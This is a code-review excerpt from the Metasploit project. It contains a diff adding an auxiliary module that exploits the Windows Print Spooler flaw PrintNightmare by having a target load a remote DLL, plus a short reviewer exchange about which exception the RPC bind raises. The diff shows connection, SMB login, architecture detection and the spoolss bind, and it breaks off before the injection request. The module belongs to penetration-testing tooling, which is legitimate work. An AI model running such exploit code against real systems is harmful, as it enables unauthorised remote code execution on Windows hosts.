modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

```diff
@@ -0,0 +1,430 @@
+    end
+  end
+end
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+
+  # PrintSystem = RubySMB::Dcerpc::PrintSystem
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Print Spooler Remote DLL Injection',
+        'Description' => %q{
+          The print spooler service can be abused to load a remote DLL through a
+          crafted DCERPC request.
+        },
+        'Author' => [
+          'Zhiniang Peng',           # vulnerability discovery / research
+          'Xuefeng Li',              # vulnerability discovery / research
+          'Zhipeng Huo',             # vulnerability discovery
+          'Piotr Madej',             # vulnerability discovery
+          'Zhang Yunhai',            # vulnerability discovery
+          'cube0x0',                 # PoC
+          'Spencer McIntyre',        # metasploit module
+          'Christophe De La Fuente', # metasploit module co-author
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-1675'],
+          ['CVE', '2021-34527'],
+          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
+          ['URL', 'https://github.com/afwu/PrintNightmare'],
+          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1']
+        ],
+        'Notes' => {
+          'AKA' => [ 'PrintNightmare' ],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [
+            UNRELIABLE_SESSION # appears to fail after succeeding once until the server is restarted
+          ],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK # the dll will be copied to the remote server
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('DLL_PATH', [ true, 'The path to the DLL that the server should load' ])
+      ]
+    )
+  end
+
+  def run
+    begin
+      connect
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to connect to the remote service.')
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::LoginError
+      fail_with(Failure::NoAccess, 'Failed to authenticate to the remote service.')
+    end
+
+    arch = dcerpc_getarch
+    print_status("Target environment: Windows v#{simple.client.os_version} (#{arch})")
+
+    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43
+    if arch == ARCH_X64
+      environment = 'Windows x64'
+    elsif arch == ARCH_X86
+      environment = 'Windows NT x86'
+    else
+      fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported')
+    end
+
+    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])
+    vprint_status("Binding to #{handle} ...")
+    begin
+      dcerpc_bind(handle)
+    rescue RubySMB::Error::UnexpectedStatusCode => e
```

Comment:
I'm failing to see where this exception gets thrown anywhere within the call chain. If anything it seems like `ArgumentError` and `::Rex::Proto::DCERPC::Exceptions::BindError` is more common.

Reply:
It's thrown when the Print Spooler service is disabled. If you can provide steps that cause other exceptions to be thrown, I'll look at handling those as well.